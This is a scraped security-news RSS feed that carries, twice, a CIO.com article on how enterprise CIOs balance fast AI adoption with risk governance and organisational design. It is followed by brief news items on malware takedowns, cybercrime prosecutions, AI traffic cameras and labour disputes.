<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The new CIO mandate is clear: facilitate AI adoption across the enterprise at speed.</p>



<p>According to CIO.com’s <a href="https://us.resources.cio.com/resources/state-of-the-cio/" rel="nofollow">State of the CIO survey, CEOs’ to</a>p priority for their IT executives is to <a href="https://www.cio.com/article/4171959/ceos-top-priorities-for-it-leaders-today-2.html">capitalize on AI</a>. From researching to evaluating AI products, CIOs are now the central figures in their organizations’ AI strategies.</p>



<p>And company leaders are looking for real outcomes. Almost two-thirds of senior leaders report there is more pressure to prove ROI on their AI investments than a year ago, according to <a href="https://www.kyndryl.com/us/en/insights/readiness-report-2025" rel="nofollow">Kyndryl’s 2025 Readiness Report</a>.</p>



<p>Numerous sources — from the board, to the CEO, to business units and competitors — are behind this pressure, says <a href="https://www.linkedin.com/in/tushman/" rel="nofollow">Jonathan Tushman</a>, chief AI officer and CTO at Hi Marley, a customer conversational platform for the property and casualty insurance industry.</p>



<p>Succeeding in the task ahead of them requires complex conversations, and getting through legal, compliance, and other checks “at a reasonable clip,” adds Tushman, who added CAIO to his remit more than 18 months ago but has felt added urgency in the past six months. In professional gatherings, board conversations, and almost everywhere across the business world, the conversation turns to AI — and then quickly the fear of failing behind.</p>



<p>That includes employees as well. “It’s the engineering team and there’s everybody else — marketing, sales, finance. It’s people who are not AI-native, but they’re very eager to use these tools at an early level,” he says.</p>



<p>As CIOs find themselves facing pressure to scale and demonstrate real value, the challenge is keeping up with risk considerations — without creating unnecessary friction.</p>



<p>“CIOs cannot be risk averse on this,” says <a href="https://www.linkedin.com/in/chakraj/" rel="nofollow">Karthik Chakkarapani</a>, SVP, CIO, and head of enterprise AI at Zuora. “We need to do security and governance, but we don’t want to be seen as slowing down the process. You have to build the highway with enough guardrails and fewer speed breakers.”</p>



<p>Moreover, he adds, “this is not about automating existing work. This is reimagining how work gets done.”</p>



<h2 class="wp-block-heading">AI is a step-change in risk management</h2>



<p>Most IT leaders are a long way from feeling comfortable with the new AI risk management balancing act. Just 31% of respondents feel completely ready across external business risks, Kyndryl’s survey reports.</p>



<p>Tushman believes two things are genuinely different about the risks AI introduces. The first is that AI is indeterminate, whereas most technology is deterministic. “You can’t prove an AI system will or won’t do X, so the traditional ‘put controls around it and verify’ model breaks down,” he says. “We need a different way to govern something whose behavior you fundamentally can’t pin down.”</p>



<p>The second is the gravitational pull on end-users. “With most tech, IT could take its time evaluating before rollout,” he says. “With AI, if you don’t put powerful tools in front of people fast, they’ll route around you — and shadow use creates more risk than controlled access ever would. The timeline compresses at the same time the control model gets harder.”</p>



<p><a href="https://www.linkedin.com/in/tonyvizza/" rel="nofollow">Tony Vizza,</a> founder and managing partner of Novera, agrees that the instinct to move fast can lead to the exact failures everyone fears.</p>



<p>“This might be staff putting sensitive information into public tools without a proper governance structure, or people copying and pasting straight out of AI and sending incorrect deliverables to customers,” says Vizza.</p>



<p>Organizations should avoid jumping into AI <a href="https://www.cio.com/article/4164155/your-ceo-just-got-ai-fomo-here-are-6-tips-on-what-to-do-next.html">because of the fear of missing out</a> without first clarifying where and how it will be used. All risk decisions should flow from these questions, he says. “What problems are you trying to solve — is it better customer service or deeper insight into your data? What are you actually trying to do?”</p>



<p>Vizza recommends guiding AI decisions with a risk assessment that considers expected outcomes, size of investment, and its importance to the organization’s objectives. “You define your risk appetite, build a risk register, and define what risk treatment should be for each risk,” he says. “For example, if you’re going to use a public AI model, you might treat that risk by not putting sensitive data in or buying the right license so that if you do, you’re covered, or getting guidance from the regulator before you proceed.”</p>



<p>Organizations must also consider AI services as a third-party risk, and not leave all accountability with AI providers, Vizza says. “You can’t outsource the responsibility,” he adds.</p>



<p>Due diligence is required to understand what is in the AI provider’s contract, who is responsible if they have a data breach, and how your organization can pursue them if something goes wrong.</p>



<p>“Some organizations build that into their risk management process. Others are quite flippant or don’t even know they should be asking those questions — and that’s what gets them stuck down the track,” he says.</p>



<h2 class="wp-block-heading">The importance of organizational design</h2>



<p>At Hi Marley, Tushman and team have made structural decisions to foster “healthy internal tensions” that are intended to surface and address AI risk considerations. This includes separation between the “AI adopters” in the product and technical teams and the “AI oversight” teams in compliance and legal. Compliance owns the audits, security concerns, and ongoing oversight, while legal owns the documentation that describes the boundaries. “The key is that it’s independent from the teams pushing AI forward,” he says.</p>



<p>“Companies need to invest seriously in these compliance functions. Hire smart, nuanced people. These roles can’t just be ‘no’ machines, but they can’t rubber-stamp everything either. The value is in the judgment,” he says.</p>



<p>Tushman’s role is the AI innovation steward, spearheading AI adoption that includes being challenged on risk, compliance, and legal considerations. “We have a senior leadership team and we have ‘conflict by design’ within that group,” he says. “I play the CAIO role and next to me, I have our head of legal and our head of compliance. So in that leadership team, if we have ‘conflict,’ we’re able to understand the trade-offs and make a decision as a group.”</p>



<p>Tushman believes this creates healthy tension: Innovation-minded leaders push boundaries while compliance and risk leaders counterbalance them. But if a decision can’t be reached, it goes to the CEO. “I do recommend a [split decision] goes to another officer in the organization,” he says.</p>



<p>Decisions about organizational structure could prove to be as consequential as the AI adoption decisions themselves, Tushman says. “The companies that get the organizational design right early will have a real advantage,” he explains.</p>



<h2 class="wp-block-heading">Desire for AI advances the risk equation</h2>



<p>One of the features of the AI wave is the thirst for access — from the board to employees — to use the tools, build applications, and start putting them to work. “Right now, everyone’s dying to try it,” says Tushman.</p>



<p>Hi Marley is in the “activation” phase — meeting the appetite for the tools with safety wrappers. “My main goal here is to have people learn the tools, start using them, and gain some competency with them,” he says. “We will get to the measurement phase, but I think spending too much time on measuring right now is not worth the effort.”</p>



<p>Tushman, like many, is watching how quickly models improve. “AI has huge implications for how you organize, how you hire, and what buy‑versus‑build decisions you make,” he says.</p>



<p>Zuora, which specializes in software for subscription and recurring revenue businesses, is three years into its AI journey. Chakkarapani is adamant that speed for speed’s sake is not the goal.</p>



<p>“We don’t want to take an existing process and just make it faster. You’re just making a process more chaotic. Can we make it fast, smarter, and reorganize it?”</p>



<p>Vizza believes a good percentage of CIOs will need external help to navigate the push for rapid AI adoption. “Or they’ll need to upskill themselves, because AI operates very differently to traditional IT,” he says.</p>



<p>His advice is threefold. First, “make your decisions on the right basis — either learn how AI really works or bring in someone who can advise you properly,” he says. Second, bring it back to the business purpose. “There are opportunities with AI, but the core question is, ‘What are we trying to achieve by bringing this in?’” And third, work out how you’re going to manage the risk. “Risk isn’t necessarily a bad thing — Formula 1 cars are risky, but they have very good braking systems so they can go faster,” he says. “It’s the same with AI: You put the right risk management in place so the business can move quickly without suffering adverse consequences.”</p>



<p>In its almost three-year AI journey, Zuora started with experimentation before moving 12 enterprise-wide pilots into production, Chakkarapani says, adding that there are three pillars to assess potential AI projects against: effort, value, and confidence. “Effort includes the security risk,” he says. “Is it low, medium, or high?”</p>



<p>Chakkarapani’s team started with simple executions, although the first experiments didn’t go as hoped — providing valuable lessons for the following ones. “We learned AI is only good when you have the right data — the right content, context, and governance,” he says.</p>



<p>They moved on to IT service management and that’s when the practical learnings really started, gaining feedback from internal teams and users, answering the security and governance questions, and iterating as they went.</p>



<p>Early applications include marketing, sales, product, and technology, achieving 10x to 25x throughput improvements. Success is measured in business outcomes such as growth, cost saving, customer engagement.</p>



<p>Through this process, the team has been doing the “behind the scenes” work to speed AI adoption across the company. “We realized that to go at speed and scale, we need to have the right trust, security, and governance underlying it,” he says.</p>



<p>An enterprise-wide platform connects Zuora’s approved AI services, including ChatGPT and domain-specific tools, to its structured and unstructured data. On top of this is the context layer and services so that people can build their own applications. It uses each employee’s existing login and organizational profile, and it respects the same role-based security.</p>



<p>“We slowly developed the framework that became our blueprint with the 10 to 12 things that need to be considered when creating an AI-driven application. When someone is interested, they’re taken to the self-directed process with these do’s and don’ts that is automatically downloaded as a markdown file to that person’s computer,” he says.</p>



<p>The ultimate aim is delivering up to 100x business value through an enterprise-wide governed platform — covering IT, HR, finance, legal, procurement, sales, and product. IT plays the role of orchestrator, providing the platform to access the tools and agents and collaborating with the business team to reorganize that workflow.</p>



<h2 class="wp-block-heading">The AI maturity model</h2>



<p>Chakkarapani believes the more secure the environment, the more it paves the way for experimentation, adoption, and, in time, business results. At Zuora, Chakkarapani has evolved this process through three levels of organizational AI maturity to date:</p>



<p><strong>Level 1:</strong> IT provides a platform and services. Employees have controlled access to data based on their role and security privileges. They can create their own agent for themselves. If something doesn’t pass the minimal security and compliance and requirements, it cannot move ahead.</p>



<p><strong>Level 2:</strong> An employee-built agent goes through an IT governance check for duplication or overlap, model improvements, security scans, and manual reviews. If approved, it’s shared with the wider enterprise. “We’re doing well on that, but it’s still a lot of manual work because there are no tools in the market that can automate this,” he says.</p>



<p><strong>Level 3:</strong> At this stage of maturity, an organization has established a secure foundation across its applications so AI can scale safely. At Zuora, over six to eight months the team tightened endpoint and application security, enforced mobile device management, introduced AI usage monitoring (including what staff upload into prompts), and disabled Google authentication to block personal or bulk email accounts from accessing unapproved apps.</p>



<p>Earlier this year, the team embarked on working toward Level 4 maturity, where anyone can create a functioning application with minimal human involvement. Realistically, they expect to be 80% to 85% zero-touch because the final mile will still require human involvement.</p>



<p>“My goal is to provide a zero-touch service for anybody in the organization to create applications. If we do, they can go from a concept to an idea, prototype, design, and production — and they do it in less than two weeks,” he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rethinking the balance between AI oversight and innovation]]></title>
<description><![CDATA[The new CIO mandate is clear: facilitate AI adoption across the enterprise at speed.



According to CIO.com’s State of the CIO survey, CEOs’ top priority for their IT executives is to capitalize on AI. From researching to evaluating AI products, CIOs are now the central figures in their organiza...]]></description>
<link>https://tsecurity.de/de/3624047/it-security-nachrichten/rethinking-the-balance-between-ai-oversight-and-innovation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624047/it-security-nachrichten/rethinking-the-balance-between-ai-oversight-and-innovation/</guid>
<pubDate>Thu, 25 Jun 2026 12:08:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The new CIO mandate is clear: facilitate AI adoption across the enterprise at speed.</p>



<p>According to CIO.com’s <a href="https://us.resources.cio.com/resources/state-of-the-cio/">State of the CIO survey, CEOs’ to</a>p priority for their IT executives is to <a href="https://www.cio.com/article/4171959/ceos-top-priorities-for-it-leaders-today-2.html">capitalize on AI</a>. From researching to evaluating AI products, CIOs are now the central figures in their organizations’ AI strategies.</p>



<p>And company leaders are looking for real outcomes. Almost two-thirds of senior leaders report there is more pressure to prove ROI on their AI investments than a year ago, according to <a href="https://www.kyndryl.com/us/en/insights/readiness-report-2025">Kyndryl’s 2025 Readiness Report</a>.</p>



<p>Numerous sources — from the board, to the CEO, to business units and competitors — are behind this pressure, says <a href="https://www.linkedin.com/in/tushman/">Jonathan Tushman</a>, chief AI officer and CTO at Hi Marley, a customer conversational platform for the property and casualty insurance industry.</p>



<p>Succeeding in the task ahead of them requires complex conversations, and getting through legal, compliance, and other checks “at a reasonable clip,” adds Tushman, who added CAIO to his remit more than 18 months ago but has felt added urgency in the past six months. In professional gatherings, board conversations, and almost everywhere across the business world, the conversation turns to AI — and then quickly the fear of failing behind.</p>



<p>That includes employees as well. “It’s the engineering team and there’s everybody else — marketing, sales, finance. It’s people who are not AI-native, but they’re very eager to use these tools at an early level,” he says.</p>



<p>As CIOs find themselves facing pressure to scale and demonstrate real value, the challenge is keeping up with risk considerations — without creating unnecessary friction.</p>



<p>“CIOs cannot be risk averse on this,” says <a href="https://www.linkedin.com/in/chakraj/">Karthik Chakkarapani</a>, SVP, CIO, and head of enterprise AI at Zuora. “We need to do security and governance, but we don’t want to be seen as slowing down the process. You have to build the highway with enough guardrails and fewer speed breakers.”</p>



<p>Moreover, he adds, “this is not about automating existing work. This is reimagining how work gets done.”</p>



<h2 class="wp-block-heading">AI is a step-change in risk management</h2>



<p>Most IT leaders are a long way from feeling comfortable with the new AI risk management balancing act. Just 31% of respondents feel completely ready across external business risks, Kyndryl’s survey reports.</p>



<p>Tushman believes two things are genuinely different about the risks AI introduces. The first is that AI is indeterminate, whereas most technology is deterministic. “You can’t prove an AI system will or won’t do X, so the traditional ‘put controls around it and verify’ model breaks down,” he says. “We need a different way to govern something whose behavior you fundamentally can’t pin down.”</p>



<p>The second is the gravitational pull on end-users. “With most tech, IT could take its time evaluating before rollout,” he says. “With AI, if you don’t put powerful tools in front of people fast, they’ll route around you — and shadow use creates more risk than controlled access ever would. The timeline compresses at the same time the control model gets harder.”</p>



<p><a href="https://www.linkedin.com/in/tonyvizza/">Tony Vizza,</a> founder and managing partner of Novera, agrees that the instinct to move fast can lead to the exact failures everyone fears.</p>



<p>“This might be staff putting sensitive information into public tools without a proper governance structure, or people copying and pasting straight out of AI and sending incorrect deliverables to customers,” says Vizza.</p>



<p>Organizations should avoid jumping into AI <a href="https://www.cio.com/article/4164155/your-ceo-just-got-ai-fomo-here-are-6-tips-on-what-to-do-next.html">because of the fear of missing out</a> without first clarifying where and how it will be used. All risk decisions should flow from these questions, he says. “What problems are you trying to solve — is it better customer service or deeper insight into your data? What are you actually trying to do?”</p>



<p>Vizza recommends guiding AI decisions with a risk assessment that considers expected outcomes, size of investment, and its importance to the organization’s objectives. “You define your risk appetite, build a risk register, and define what risk treatment should be for each risk,” he says. “For example, if you’re going to use a public AI model, you might treat that risk by not putting sensitive data in or buying the right license so that if you do, you’re covered, or getting guidance from the regulator before you proceed.”</p>



<p>Organizations must also consider AI services as a third-party risk, and not leave all accountability with AI providers, Vizza says. “You can’t outsource the responsibility,” he adds.</p>



<p>Due diligence is required to understand what is in the AI provider’s contract, who is responsible if they have a data breach, and how your organization can pursue them if something goes wrong.</p>



<p>“Some organizations build that into their risk management process. Others are quite flippant or don’t even know they should be asking those questions — and that’s what gets them stuck down the track,” he says.</p>



<h2 class="wp-block-heading">The importance of organizational design</h2>



<p>At Hi Marley, Tushman and team have made structural decisions to foster “healthy internal tensions” that are intended to surface and address AI risk considerations. This includes separation between the “AI adopters” in the product and technical teams and the “AI oversight” teams in compliance and legal. Compliance owns the audits, security concerns, and ongoing oversight, while legal owns the documentation that describes the boundaries. “The key is that it’s independent from the teams pushing AI forward,” he says.</p>



<p>“Companies need to invest seriously in these compliance functions. Hire smart, nuanced people. These roles can’t just be ‘no’ machines, but they can’t rubber-stamp everything either. The value is in the judgment,” he says.</p>



<p>Tushman’s role is the AI innovation steward, spearheading AI adoption that includes being challenged on risk, compliance, and legal considerations. “We have a senior leadership team and we have ‘conflict by design’ within that group,” he says. “I play the CAIO role and next to me, I have our head of legal and our head of compliance. So in that leadership team, if we have ‘conflict,’ we’re able to understand the trade-offs and make a decision as a group.”</p>



<p>Tushman believes this creates healthy tension: Innovation-minded leaders push boundaries while compliance and risk leaders counterbalance them. But if a decision can’t be reached, it goes to the CEO. “I do recommend a [split decision] goes to another officer in the organization,” he says.</p>



<p>Decisions about organizational structure could prove to be as consequential as the AI adoption decisions themselves, Tushman says. “The companies that get the organizational design right early will have a real advantage,” he explains.</p>



<h2 class="wp-block-heading">Desire for AI advances the risk equation</h2>



<p>One of the features of the AI wave is the thirst for access — from the board to employees — to use the tools, build applications, and start putting them to work. “Right now, everyone’s dying to try it,” says Tushman.</p>



<p>Hi Marley is in the “activation” phase — meeting the appetite for the tools with safety wrappers. “My main goal here is to have people learn the tools, start using them, and gain some competency with them,” he says. “We will get to the measurement phase, but I think spending too much time on measuring right now is not worth the effort.”</p>



<p>Tushman, like many, is watching how quickly models improve. “AI has huge implications for how you organize, how you hire, and what buy‑versus‑build decisions you make,” he says.</p>



<p>Zuora, which specializes in software for subscription and recurring revenue businesses, is three years into its AI journey. Chakkarapani is adamant that speed for speed’s sake is not the goal.</p>



<p>“We don’t want to take an existing process and just make it faster. You’re just making a process more chaotic. Can we make it fast, smarter, and reorganize it?”</p>



<p>Vizza believes a good percentage of CIOs will need external help to navigate the push for rapid AI adoption. “Or they’ll need to upskill themselves, because AI operates very differently to traditional IT,” he says.</p>



<p>His advice is threefold. First, “make your decisions on the right basis — either learn how AI really works or bring in someone who can advise you properly,” he says. Second, bring it back to the business purpose. “There are opportunities with AI, but the core question is, ‘What are we trying to achieve by bringing this in?’” And third, work out how you’re going to manage the risk. “Risk isn’t necessarily a bad thing — Formula 1 cars are risky, but they have very good braking systems so they can go faster,” he says. “It’s the same with AI: You put the right risk management in place so the business can move quickly without suffering adverse consequences.”</p>



<p>In its almost three-year AI journey, Zuora started with experimentation before moving 12 enterprise-wide pilots into production, Chakkarapani says, adding that there are three pillars to assess potential AI projects against: effort, value, and confidence. “Effort includes the security risk,” he says. “Is it low, medium, or high?”</p>



<p>Chakkarapani’s team started with simple executions, although the first experiments didn’t go as hoped — providing valuable lessons for the following ones. “We learned AI is only good when you have the right data — the right content, context, and governance,” he says.</p>



<p>They moved on to IT service management and that’s when the practical learnings really started, gaining feedback from internal teams and users, answering the security and governance questions, and iterating as they went.</p>



<p>Early applications include marketing, sales, product, and technology, achieving 10x to 25x throughput improvements. Success is measured in business outcomes such as growth, cost saving, customer engagement.</p>



<p>Through this process, the team has been doing the “behind the scenes” work to speed AI adoption across the company. “We realized that to go at speed and scale, we need to have the right trust, security, and governance underlying it,” he says.</p>



<p>An enterprise-wide platform connects Zuora’s approved AI services, including ChatGPT and domain-specific tools, to its structured and unstructured data. On top of this is the context layer and services so that people can build their own applications. It uses each employee’s existing login and organizational profile, and it respects the same role-based security.</p>



<p>“We slowly developed the framework that became our blueprint with the 10 to 12 things that need to be considered when creating an AI-driven application. When someone is interested, they’re taken to the self-directed process with these do’s and don’ts that is automatically downloaded as a markdown file to that person’s computer,” he says.</p>



<p>The ultimate aim is delivering up to 100x business value through an enterprise-wide governed platform — covering IT, HR, finance, legal, procurement, sales, and product. IT plays the role of orchestrator, providing the platform to access the tools and agents and collaborating with the business team to reorganize that workflow.</p>



<h2 class="wp-block-heading">The AI maturity model</h2>



<p>Chakkarapani believes the more secure the environment, the more it paves the way for experimentation, adoption, and, in time, business results. At Zuora, Chakkarapani has evolved this process through three levels of organizational AI maturity to date:</p>



<p><strong>Level 1:</strong> IT provides a platform and services. Employees have controlled access to data based on their role and security privileges. They can create their own agent for themselves. If something doesn’t pass the minimal security and compliance and requirements, it cannot move ahead.</p>



<p><strong>Level 2:</strong> An employee-built agent goes through an IT governance check for duplication or overlap, model improvements, security scans, and manual reviews. If approved, it’s shared with the wider enterprise. “We’re doing well on that, but it’s still a lot of manual work because there are no tools in the market that can automate this,” he says.</p>



<p><strong>Level 3:</strong> At this stage of maturity, an organization has established a secure foundation across its applications so AI can scale safely. At Zuora, over six to eight months the team tightened endpoint and application security, enforced mobile device management, introduced AI usage monitoring (including what staff upload into prompts), and disabled Google authentication to block personal or bulk email accounts from accessing unapproved apps.</p>



<p>Earlier this year, the team embarked on working toward Level 4 maturity, where anyone can create a functioning application with minimal human involvement. Realistically, they expect to be 80% to 85% zero-touch because the final mile will still require human involvement.</p>



<p>“My goal is to provide a zero-touch service for anybody in the organization to create applications. If we do, they can go from a concept to an idea, prototype, design, and production — and they do it in less than two weeks,” he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘This operation marked a shift in strategy’: Three notorious malware networks have been taken down using RICO legislation]]></title>
<description><![CDATA[The action involved the use of US racketeering laws to treat two malware families as part of a single conspiracy]]></description>
<link>https://tsecurity.de/de/3624000/it-security-nachrichten/this-operation-marked-a-shift-in-strategy-three-notorious-malware-networks-have-been-taken-down-using-rico-legislation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624000/it-security-nachrichten/this-operation-marked-a-shift-in-strategy-three-notorious-malware-networks-have-been-taken-down-using-rico-legislation/</guid>
<pubDate>Thu, 25 Jun 2026 11:52:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The action involved the use of US racketeering laws to treat two malware families as part of a single conspiracy]]></content:encoded>
</item>
<item>
<title><![CDATA[AI traffic cameras spark backlash in Mississippi — as government officials try to calm fears they’ll be used to catch motorists who are speeding, not wearing seatbelts or texting at the wheel]]></title>
<description><![CDATA[Government officials in Mississippi have been attempting to calm fears that new AI traffic cameras will become a massive privacy violation.]]></description>
<link>https://tsecurity.de/de/3622591/it-nachrichten/ai-traffic-cameras-spark-backlash-in-mississippi-as-government-officials-try-to-calm-fears-theyll-be-used-to-catch-motorists-who-are-speeding-not-wearing-seatbelts-or-texting-at-the-wheel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622591/it-nachrichten/ai-traffic-cameras-spark-backlash-in-mississippi-as-government-officials-try-to-calm-fears-theyll-be-used-to-catch-motorists-who-are-speeding-not-wearing-seatbelts-or-texting-at-the-wheel/</guid>
<pubDate>Wed, 24 Jun 2026 21:03:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Government officials in Mississippi have been attempting to calm fears that new AI traffic cameras will become a massive privacy violation.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Master the Disaster? (tdf2026)]]></title>
<description><![CDATA[The world breaks apart, but good news are: Anarchists & activists are better prepared for doomsday than we might think. We are familiar with the absence of command-lines and a lack of resources. In countless campaigns, mobilisations & mass actions, we´ve learned to abandon micromanagement & to tr...]]></description>
<link>https://tsecurity.de/de/3622563/it-security-video/how-to-master-the-disaster-tdf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622563/it-security-video/how-to-master-the-disaster-tdf2026/</guid>
<pubDate>Wed, 24 Jun 2026 20:50:25 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The world breaks apart, but good news are: Anarchists &amp; activists are better prepared for doomsday than we might think. We are familiar with the absence of command-lines and a lack of resources. In countless campaigns, mobilisations &amp; mass actions, we´ve learned to abandon micromanagement &amp; to trust our fellow activists. We´ve learned to organize and to get everyone a task that fits their capabilities. We will talk about strategies to navigate the chaos and what official disaster response structures can learn from social movements - and furthermore: Why software developers and other nerds might be a catalyst to scale up these strategies.

Both, Berlin and New York were hit by disasters this winter. New York by a blizzard, Berlin by a blackout. the Mayors of both cities were immediately hands on. Kai Wegner, Mayor of Berlin took a tennis racket and developed excuses, when bottlenecks within the pyramidal organised disaster response led to embarrassing failure; Zohran Mamdani, mayor of New York, took a snow shovel himself and invited everyone to join and clear necessary infrastructure from snow, in a grassroots styled and decentralised response. Everyone could get a shovel and everyone would be payed. This and other examples show, how strategies, activists are using to organise social movements, could also work out to master the disaster of any kind. This is not only good for doomsday, but we can deviate strategies how to prevent it. Its not a coincidence that the fire brigade and socialism both are associated with red colour. Let´s not leave the blue lights to the cops, lets grab the chance and the shovels and become disaster responders.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.cttue.de/tdf5/talk/AKYVCK/]]></content:encoded>
</item>
<item>
<title><![CDATA[„The human in the loop“ – AI induced skill atrophy (tdf2026)]]></title>
<description><![CDATA[The principle of "the human in the loop" is often touted as a control mechanism for AI agents, and is also used to quell fears of unemployment. Unfortunately, this directly contradicts the way most of us learn and maintain our skills. And it seems like this effect is not a bug, but a feature.

Li...]]></description>
<link>https://tsecurity.de/de/3622559/it-security-video/the-human-in-the-loop-ai-induced-skill-atrophy-tdf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622559/it-security-video/the-human-in-the-loop-ai-induced-skill-atrophy-tdf2026/</guid>
<pubDate>Wed, 24 Jun 2026 20:50:19 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The principle of &quot;the human in the loop&quot; is often touted as a control mechanism for AI agents, and is also used to quell fears of unemployment. Unfortunately, this directly contradicts the way most of us learn and maintain our skills. And it seems like this effect is not a bug, but a feature.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.cttue.de/tdf5/talk/L7TPZ8/]]></content:encoded>
</item>
<item>
<title><![CDATA[Labor tax critic deletes anti-immigration AI video reposted from rightwing nationalist account]]></title>
<description><![CDATA[Fund manager Geoff Wilson says he did not watch full video and deleted it after ‘inappropriate associations were identified’Get our breaking news email, free app or daily news podcastThe fund manager Geoff Wilson, a prominent public critic of the government’s tax changes, has deleted an inflammat...]]></description>
<link>https://tsecurity.de/de/3621856/ai-nachrichten/labor-tax-critic-deletes-anti-immigration-ai-video-reposted-from-rightwing-nationalist-account/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621856/ai-nachrichten/labor-tax-critic-deletes-anti-immigration-ai-video-reposted-from-rightwing-nationalist-account/</guid>
<pubDate>Wed, 24 Jun 2026 17:05:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fund manager Geoff Wilson says he did not watch full video and deleted it after ‘inappropriate associations were identified’</p><ul><li><p>Get our <a href="https://www.theguardian.com/email-newsletters?CMP=cvau_sfl">breaking news email</a>, <a href="https://app.adjust.com/w4u7jx3">free app</a> or <a href="https://www.theguardian.com/australia-news/series/full-story?CMP=cvau_sfl">daily news podcast</a></p></li></ul><p>The fund manager Geoff Wilson, a prominent public critic of the government’s tax changes, has deleted an inflammatory AI-generated video he reposted from a rightwing nationalist account portraying Anthony Albanese and Jim Chalmers taking money from white Australians and giving it to recently arrived migrants wearing Islamic face coverings.</p><p>Wilson said he had not watched the full video before sharing it or examined other accounts, some of whose content he reposted on Wednesday morning – which included content relating to the QAnon conspiracy theory – and deleted his posts after being contacted by Guardian Australia.</p> <a href="https://www.theguardian.com/australia-news/2026/jun/25/anti-immigration-ai-video-rightwing-repost-geoff-wilson-ntwnfb">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Algerian national accused of running cybercrime marketplaces extradited to US]]></title>
<description><![CDATA[An Algerian national accused of running online marketplaces that sold phishing kits and fraud tools has been extradited from Spain to the United States to face bank fraud conspiracy charges. The post Algerian national accused of running cybercrime marketplaces extradited…
Read more →
The post Alg...]]></description>
<link>https://tsecurity.de/de/3621708/it-security-nachrichten/algerian-national-accused-of-running-cybercrime-marketplaces-extradited-to-us/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621708/it-security-nachrichten/algerian-national-accused-of-running-cybercrime-marketplaces-extradited-to-us/</guid>
<pubDate>Wed, 24 Jun 2026 16:35:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An Algerian national accused of running online marketplaces that sold phishing kits and fraud tools has been extradited from Spain to the United States to face bank fraud conspiracy charges. The post Algerian national accused of running cybercrime marketplaces extradited…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/algerian-national-accused-of-running-cybercrime-marketplaces-extradited-to-us/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/algerian-national-accused-of-running-cybercrime-marketplaces-extradited-to-us/">Algerian national accused of running cybercrime marketplaces extradited to US</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Algerian national accused of running cybercrime marketplaces extradited to US]]></title>
<description><![CDATA[An Algerian national accused of running online marketplaces that sold phishing kits and fraud tools has been extradited from Spain to the United States to face bank fraud conspiracy charges.
The post Algerian national accused of running cybercrime marketplaces extradited to US appeared first on H...]]></description>
<link>https://tsecurity.de/de/3621683/it-security-nachrichten/algerian-national-accused-of-running-cybercrime-marketplaces-extradited-to-us/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621683/it-security-nachrichten/algerian-national-accused-of-running-cybercrime-marketplaces-extradited-to-us/</guid>
<pubDate>Wed, 24 Jun 2026 16:23:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An Algerian national accused of running online marketplaces that sold phishing kits and fraud tools has been extradited from Spain to the United States to face bank fraud conspiracy charges.</p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/24/algerian-cybercrime-marketplace-operator-extradited-to-us/">Algerian national accused of running cybercrime marketplaces extradited to US</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hyundai workers in South Korea vote to strike over fears of robots replacing them]]></title>
<description><![CDATA[Union at country’s largest carmaker wants greater say over how AI and automation are introduced]]></description>
<link>https://tsecurity.de/de/3620883/ai-nachrichten/hyundai-workers-in-south-korea-vote-to-strike-over-fears-of-robots-replacing-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620883/ai-nachrichten/hyundai-workers-in-south-korea-vote-to-strike-over-fears-of-robots-replacing-them/</guid>
<pubDate>Wed, 24 Jun 2026 11:49:33 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Union at country’s largest carmaker wants greater say over how AI and automation are introduced]]></content:encoded>
</item>
<item>
<title><![CDATA[TfL Hackers Plead Guilty After Breach Exposed Customer Data and Cost £29 Million]]></title>
<description><![CDATA[Two alleged members of the cybercrime collective Scattered Spider have pleaded guilty to their roles in the Transport for London cyberattack, an incident that disrupted services, exposed customer data, and resulted in approximately £29 million in losses and recovery costs for London's transport a...]]></description>
<link>https://tsecurity.de/de/3620296/it-security-nachrichten/tfl-hackers-plead-guilty-after-breach-exposed-customer-data-and-cost-29-million/</link>
